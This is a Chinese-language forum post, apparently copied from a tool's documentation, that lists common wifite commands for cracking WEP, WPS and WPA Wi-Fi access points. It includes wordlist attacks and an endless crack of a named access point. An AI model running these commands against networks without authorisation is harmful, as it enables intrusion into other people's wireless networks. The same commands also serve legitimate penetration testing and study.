| 
 
上校 三人行→必有奸情 
 
   
 注册时间2010-1-26
 金币12800 个
 威望11 个
 荣誉1 个
 累计签到:1386 天连续签到:0 天
 [LV.1825]无线元老
 | 		
 
| 部分常用命令 to crack all WEP access points:
 
 ./wifite.py -all -wep
 to crack all WPS access points with signal strength greater than (or equal to) 50dB:
 
 ./wifite.py -p 50 -wps
 to attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:
 
 ./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst
 to attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically:
 
 ./wifite.py -all -wpa --dict none
 to crack all WEP access points greater than 50dB in strength, giving 5 minutes for each WEP attack method, and send packets at 600 packets/sec:
 
 ./wifite.py --pow 50 -wept 300 -pps 600
 to attempt to crack WEP-encrypted access point "2WIRE752" endlessly -- program will not stop until key is cracked or user interrrupts with ctrl+C):
 
 ./wifite.py -e "2WIRE752" -wept 0
 | 
 |